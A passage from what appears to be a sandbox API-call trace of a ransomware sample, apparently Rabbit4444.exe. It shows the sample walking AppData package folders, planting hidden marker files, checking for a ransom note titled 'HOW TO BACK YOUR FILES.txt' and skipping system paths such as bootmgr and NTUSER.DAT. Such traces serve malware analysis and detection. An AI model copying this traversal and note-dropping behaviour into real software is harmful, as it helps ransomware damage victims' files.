(lpString1="..", lpString2="..") returned 0 [0061.965] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee41741a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee41741a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee41741a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.965] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.965] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.965] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee41741a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee41741a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee41741a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.965] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0061.965] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.966] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.966] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.966] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.966] CloseHandle (hObject=0x2a0) returned 1 [0061.966] CloseHandle (hObject=0x27c) returned 1 [0061.967] GetCurrentThreadId () returned 0xd98 [0061.967] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0061.967] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies" [0061.967] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0061.967] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0061.967] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies" [0061.967] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\" [0061.967] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0061.967] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.968] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.970] FlushFileBuffers (hFile=0x27c) returned 1 [0061.971] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.971] CloseHandle (hObject=0x27c) returned 1 [0061.972] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies") returned 101 [0061.972] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.972] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee41741a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0061.972] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.972] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.972] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.972] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.972] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee41741a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.972] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.972] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.972] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.972] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.972] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.972] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee41741a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee41741a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee43d785, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.972] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.972] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.972] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee41741a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee41741a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee43d785, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.972] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0061.972] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.972] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.973] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.973] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.974] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.974] CloseHandle (hObject=0x2a0) returned 1 [0061.974] CloseHandle (hObject=0x27c) returned 1 [0061.974] GetCurrentThreadId () returned 0xd98 [0061.974] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fc8 [0061.974] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe" [0061.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119208 | out: hHeap=0xe0000) returned 1 [0061.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0061.974] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe" [0061.974] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\" [0061.974] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0061.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.976] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.979] FlushFileBuffers (hFile=0x27c) returned 1 [0061.979] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.980] CloseHandle (hObject=0x27c) returned 1 [0061.980] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe") returned 83 [0061.980] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.980] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf22e0430, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee43d785, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.980] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.980] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.980] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.980] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.980] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf22e0430, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee43d785, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.980] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.980] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.981] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.981] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.981] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.981] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee43d785, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee43d785, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee43d785, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.981] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf22e0430, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf2306679, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0061.981] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0061.981] lstrcpyW (in: lpString1=0x130ebe0, lpString2="AC" | out: lpString1="AC") returned="AC" [0061.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0061.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x1245e8 [0061.981] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122068 [0061.981] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf213ca5b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0061.981] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0061.982] lstrcpyW (in: lpString1=0x130ebe0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0061.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0061.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x11e368 [0061.982] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220c8 [0061.982] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf213ca5b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0061.982] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0061.982] lstrcpyW (in: lpString1=0x130ebe0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0061.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0061.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x123038 [0061.982] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122128 [0061.982] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf20f05a0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf20f05a0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0061.982] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0061.982] lstrcpyW (in: lpString1=0x130ebe0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0061.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0061.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x123240 [0061.983] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122008 [0061.983] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf20f05a0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf20f05a0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0061.983] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0061.983] lstrcpyW (in: lpString1=0x130ebe0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0061.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0061.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x115dd0 [0061.983] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122228 [0061.983] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, 